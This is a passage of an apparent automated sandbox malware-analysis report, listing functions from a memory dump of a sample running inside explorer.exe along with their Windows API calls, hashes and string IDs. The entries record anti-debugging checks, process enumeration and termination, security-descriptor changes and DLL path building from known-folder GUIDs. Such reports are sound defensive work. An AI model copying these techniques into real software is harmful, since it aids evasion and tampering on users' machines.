                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$_invalid_parameter_noinfo$_cftoe_l_getptd
                          • String ID: gfffffff
                          • API String ID: 1282097019-1523873471
                          • Opcode ID: 70f64d29eda5dc2a4778368f7b480cadbb51046fac34f9dff00ff8b5627f9baf
                          • Instruction ID: eb21169a2c90eefa4253f2694f1200ce8a17a718105b664b1c3e7a5c264227ae
                          • Opcode Fuzzy Hash: 70f64d29eda5dc2a4778368f7b480cadbb51046fac34f9dff00ff8b5627f9baf
                          • Instruction Fuzzy Hash: 1AA154637247C587EB1ACB29D6843AD7BA5F721BA4F04C62ACF6A07795EB38C015C311
                          Function 011BC5E0 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • RtlCaptureContext.KERNEL32 ref: 011C0EE7
                          • RtlLookupFunctionEntry.KERNEL32 ref: 011C0F06
                          • RtlVirtualUnwind.KERNEL32 ref: 011C0F52
                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,011BA94B), ref: 011C0FC4
                          • SetUnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,011BA94B), ref: 011C0FDC
                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,011BA94B), ref: 011C0FE9
                          • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,011BA94B), ref: 011C1002
                          • TerminateProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,011BA94B), ref: 011C1010
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                          • String ID:
                          • API String ID: 3778485334-0
                          • Opcode ID: 35219957d421805f211166676d9093f278cb6e10f437b633a14091adcde31cb0
                          • Instruction ID: ebb0ac7e4e192f673d3e72be5ff45871b2d4256bb07980b443c00bb01a4f5674
                          • Opcode Fuzzy Hash: 35219957d421805f211166676d9093f278cb6e10f437b633a14091adcde31cb0
                          • Instruction Fuzzy Hash: E531D239208F85C6EB189B55F8843DAB3A5F798B54F50012AEA8E42764DF7CC09ACB45
                          Function 01191BA0 Relevance: 12.1, APIs: 8, Instructions: 57processstringCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32lstrcmpi
                          • String ID:
                          • API String ID: 1193533834-0
                          • Opcode ID: 5bb79ae64db4dd5a90531e248b891122a9d6996c0156bc627a2e6b39a5febb7a
                          • Instruction ID: 1fa09c914176e69bc93e695caa6bdccde7f88b07c79a087f4f57d8eee59e04bd
                          • Opcode Fuzzy Hash: 5bb79ae64db4dd5a90531e248b891122a9d6996c0156bc627a2e6b39a5febb7a
                          • Instruction Fuzzy Hash: E521E232219AC5C2EB78DF15E4583AAB3A1F7C4754F404229D69E866A8DF3CC546CB00
                          Function 011BA818 Relevance: 9.1, APIs: 6, Instructions: 80COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • RtlCaptureContext.KERNEL32 ref: 011BA885
                          • RtlLookupFunctionEntry.KERNEL32 ref: 011BA89D
                          • RtlVirtualUnwind.KERNEL32 ref: 011BA8D7
                          • IsDebuggerPresent.KERNEL32 ref: 011BA90D
                          • SetUnhandledExceptionFilter.KERNEL32 ref: 011BA917
                          • UnhandledExceptionFilter.KERNEL32 ref: 011BA922
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                          • String ID:
                          • API String ID: 1239891234-0
                          • Opcode ID: bf4840c27aff4b8c7025ec72b01c2eae3c7bd8f1c4b301b67cc516dbda11ae64
                          • Instruction ID: 7926d117ccc26bc1bdda99c73b6597b14f8159ec0c5185028e7e31297fbda948
                          • Opcode Fuzzy Hash: bf4840c27aff4b8c7025ec72b01c2eae3c7bd8f1c4b301b67cc516dbda11ae64
                          • Instruction Fuzzy Hash: 2A316336214F8186DB28DF29E8947DE73A4F798798F500219EB9D43B58DF38C546CB40
                          Function 0119ECE0 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                          Download Yara Rule
                          APIs
                          • AllocateAndInitializeSid.ADVAPI32 ref: 0119ED6A
                          • SetEntriesInAclW.ADVAPI32 ref: 0119EDE6
                          • LocalAlloc.KERNEL32 ref: 0119EE01
                          • InitializeSecurityDescriptor.ADVAPI32 ref: 0119EE27
                          • SetSecurityDescriptorDacl.ADVAPI32 ref: 0119EE46
                          • LocalFree.KERNEL32 ref: 0119EE62
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: DescriptorInitializeLocalSecurity$AllocAllocateDaclEntriesFree
                          • String ID:
                          • API String ID: 1761156657-0
                          • Opcode ID: 58b5056dbfd2429476338d745a5c66fefc3e3b966df627eb6fb129543995eacc
                          • Instruction ID: f6664ea061cc6a5333d5e4d24866376dd0738387c3abdf388b746026de3b3e7d
                          • Opcode Fuzzy Hash: 58b5056dbfd2429476338d745a5c66fefc3e3b966df627eb6fb129543995eacc
                          • Instruction Fuzzy Hash: A031B5722187C486F7649F24E45878BBBA1F385748F504119E7D946A98CFBEC049CF41
                          Function 011943D0 Relevance: 9.0, APIs: 6, Instructions: 47processCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                          • String ID:
                          • API String ID: 1789362936-0
                          • Opcode ID: c8c67cd9d69cf1c5cd18c9165593eab660a6d624cff16f01b012e03e4ca3c0c1
                          • Instruction ID: 6a1ae78746c8d50e08c91c8f171fa10e0b5cefd327ab0b760c984522ca92f79c
                          • Opcode Fuzzy Hash: c8c67cd9d69cf1c5cd18c9165593eab660a6d624cff16f01b012e03e4ca3c0c1
                          • Instruction Fuzzy Hash: BE21C131219A80C2DB68DF15E5443997365F784765F404329A6BE87AD4DF3CC506CB01
                          Function 011942E0 Relevance: 9.0, APIs: 6, Instructions: 47processCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                          • String ID:
                          • API String ID: 1789362936-0
                          • Opcode ID: 2126cdc8bb9ee2d7d810141097882338e7ddfcb2433b70e954aefb8ca035f1f8
                          • Instruction ID: acfb54488416304404715f9b1a213f73d06e209eda7a3ba7d821897cfa698dc6
                          • Opcode Fuzzy Hash: 2126cdc8bb9ee2d7d810141097882338e7ddfcb2433b70e954aefb8ca035f1f8
                          • Instruction Fuzzy Hash: C421D33521DA90C2DB68DF25F544399B3A1F784765F404339A6BE86AD4DF3CC606CB01
                          Function 011ADE00 Relevance: 9.0, APIs: 6, Instructions: 32processCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandleProcess32$CreateCurrentFirstNextProcessSnapshotToolhelp32
                          • String ID:
                          • API String ID: 3177329567-0
                          • Opcode ID: 3cc2d6c88128d3cd302e3c3b427e122420062b561a5866bb653fc894148c4347
                          • Instruction ID: f157aad263af9d5921d5b3b1ecc384666fb2de177e8e24d44a659b289488a954
                          • Opcode Fuzzy Hash: 3cc2d6c88128d3cd302e3c3b427e122420062b561a5866bb653fc894148c4347
                          • Instruction Fuzzy Hash: C601A976618A8483EB68AF55F44839AB7B0F7D8758F405229B78A86A68DF3CC545CB00
                          Function 011ADD1E Relevance: 3.0, APIs: 2, Instructions: 13encryptionCOMMON
                          Download Yara Rule
                          APIs
                          • CryptReleaseContext.ADVAPI32 ref: 011ADDD2
                          • CryptDestroyHash.ADVAPI32 ref: 011ADDE5
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Crypt$ContextDestroyHashRelease
                          • String ID:
                          • API String ID: 3989222877-0
                          • Opcode ID: c5c1768aadb60378ad22162b9e4730754fad96458e27b0b14d4275e4d892deba
                          • Instruction ID: c7453636bf429dfbfd5945f2c5d8d2ac9e4efa87cd9399778ede902c0a41fb31
                          • Opcode Fuzzy Hash: c5c1768aadb60378ad22162b9e4730754fad96458e27b0b14d4275e4d892deba
                          • Instruction Fuzzy Hash: C0E06235524D8082EB59DB59F89879E6B61FBC1745FD41025F787419E8CF3CC456CA40
                          Function 011ADD5A Relevance: 3.0, APIs: 2, Instructions: 13encryptionCOMMON
                          Download Yara Rule
                          APIs
                          • CryptReleaseContext.ADVAPI32 ref: 011ADDD2
                          • CryptDestroyHash.ADVAPI32 ref: 011ADDE5
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Crypt$ContextDestroyHashRelease
                          • String ID:
                          • API String ID: 3989222877-0
                          • Opcode ID: e9356f170158ed85045823dcdf42e8ebd6240593bc235c43491c703c7f15f5e3
                          • Instruction ID: c7453636bf429dfbfd5945f2c5d8d2ac9e4efa87cd9399778ede902c0a41fb31
                          • Opcode Fuzzy Hash: e9356f170158ed85045823dcdf42e8ebd6240593bc235c43491c703c7f15f5e3
                          • Instruction Fuzzy Hash: C0E06235524D8082EB59DB59F89879E6B61FBC1745FD41025F787419E8CF3CC456CA40
                          Function 011ADD8F Relevance: 3.0, APIs: 2, Instructions: 13encryptionCOMMON
                          Download Yara Rule
                          APIs
                          • CryptReleaseContext.ADVAPI32 ref: 011ADDD2
                          • CryptDestroyHash.ADVAPI32 ref: 011ADDE5
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Crypt$ContextDestroyHashRelease
                          • String ID:
                          • API String ID: 3989222877-0
                          • Opcode ID: c8dc4400690b48537e0aafe92792f067d9f6826edbb111285d4f7ba620e35a5e
                          • Instruction ID: c7453636bf429dfbfd5945f2c5d8d2ac9e4efa87cd9399778ede902c0a41fb31
                          • Opcode Fuzzy Hash: c8dc4400690b48537e0aafe92792f067d9f6826edbb111285d4f7ba620e35a5e
                          • Instruction Fuzzy Hash: C0E06235524D8082EB59DB59F89879E6B61FBC1745FD41025F787419E8CF3CC456CA40
                          Function 011ADCF7 Relevance: 3.0, APIs: 2, Instructions: 13encryptionCOMMON
                          Download Yara Rule
                          APIs
                          • CryptReleaseContext.ADVAPI32 ref: 011ADDD2
                          • CryptDestroyHash.ADVAPI32 ref: 011ADDE5
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Crypt$ContextDestroyHashRelease
                          • String ID:
                          • API String ID: 3989222877-0
                          • Opcode ID: 05d24737d62e8f84dcb68c5fbac8ceb44c8b287674e4df4f053df66770bee29a
                          • Instruction ID: c7453636bf429dfbfd5945f2c5d8d2ac9e4efa87cd9399778ede902c0a41fb31
                          • Opcode Fuzzy Hash: 05d24737d62e8f84dcb68c5fbac8ceb44c8b287674e4df4f053df66770bee29a
                          • Instruction Fuzzy Hash: C0E06235524D8082EB59DB59F89879E6B61FBC1745FD41025F787419E8CF3CC456CA40
                          Function 011A5AA0 Relevance: 278.7, APIs: 68, Strings: 91, Instructions: 497memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0119F790: SHGetKnownFolderPath.SHELL32(?,?,?,?,?,?,?,?,011A6834), ref: 0119F7AF
                            • Part of subcall function 0119F790: LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,011A6834), ref: 0119F7C3
                            • Part of subcall function 0119F790: wnsprintfW.SHLWAPI ref: 0119F7FC
                            • Part of subcall function 0119F790: lstrlenW.KERNEL32 ref: 0119F80B
                            • Part of subcall function 0119F790: CoTaskMemFree.COMBASE ref: 0119F81D
                          • LocalAlloc.KERNEL32 ref: 011A5ADE
                          • LocalAlloc.KERNEL32 ref: 011A5AFF
                          • wnsprintfW.SHLWAPI ref: 011A5B3F
                          • wnsprintfW.SHLWAPI ref: 011A5B5D
                          • wnsprintfW.SHLWAPI ref: 011A5B91
                          • wnsprintfW.SHLWAPI ref: 011A5BAF
                          • LocalFree.KERNEL32 ref: 011A64D6
                          • LocalFree.KERNEL32 ref: 011A6502
                          • LocalFree.KERNEL32 ref: 011A650D
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$wnsprintf$Free$Alloc$FolderKnownPathTasklstrlen
                          • String ID: #$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL${0EFCC0CA-E494-495E-8BFA-3EB3121C6E0D}${10BFE215-061D-40FD-8815-5C8F72644B28}${21A40B76-C3B4-4664-B31E-2DC0D0725B06}${2E8EFBDF-A02C-4179-863C-6A29FA78FF6A}${3ABDA021-5E41-4624-98B4-20ADDEEE7D16}${3D978FEE-C814-4C99-BF7F-2D6040603FEF}${46435729-DE34-4BF3-A07E-81990A717CAA}${51BDD1C4-FA3F-488D-BF83-3BBD8F08065E}${55D5946A-D46C-496A-8BBC-D8EBB9A0573D}${57B617B9-43BD-4946-B949-B1B194BB326C}${59D2C462-5CE2-4677-901C-CF6D47F94E01}${5D9EC1ED-026C-4BA9-A823-A81E93CFDE64}${6A5EA296-14C9-4F73-8340-85FC05DB9D41}${71AEF5B1-1CB5-4E55-A831-320B97C08AF7}${7E4AF241-9188-44CB-AED1-67CE1C5CEEB4}${86CA2FB5-8D14-4AB7-A21A-B94AA27996D1}${91A76877-BC0D-4C96-A5BB-E6DFBFDD6440}${94FB9D8F-CD00-49FB-90DB-319F100025FD}${A833ED33-AB79-42C4-8F18-2B6F78AB7B5D}${AD591F04-B13F-46DE-971E-91B85D0D809A}${B03337F2-E002-4808-B68C-EFC2B3B7D965}${C1BD1AD9-E7EB-479A-9986-4CCAEACD58B1}${CBA71F71-923D-4984-871A-825467F689CB}${CC9E0085-98A2-4541-ADA5-57C053963E95}${CD6CD427-F451-49BC-AC5F-8EF639C64D84}${D2513884-49A5-4BCA-820E-5E259340F793}${F7C89374-15C9-42DA-9AB6-6BF0F6C9A22F}${FAC8FDCC-9415-493E-AED0-258910F001AC}${FCDCDDD8-4368-4A5F-97C4-D82E725DF941}${FD6426E3-D0BC-4529-82F7-5F6E49413ADF}
                          • API String ID: 1623426732-1736767971
                          • Opcode ID: 6f979de90f3d0588231c6db74986d895f760c93b8a5441ed2a1cde6316bd014c
                          • Instruction ID: 6b6dc6563322fdaa7ccc12889a577046e3dc9fa70e23f18b0b86deee6a48a332
                          • Opcode Fuzzy Hash: 6f979de90f3d0588231c6db74986d895f760c93b8a5441ed2a1cde6316bd014c
                          • Instruction Fuzzy Hash: C552B535518A9AD6EA189F55F8043DA6772F7C4B49F900136FB8E43A28EF3DC54ACB40
                          Function 011C1978 Relevance: 107.7, APIs: 86, Instructions: 180COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
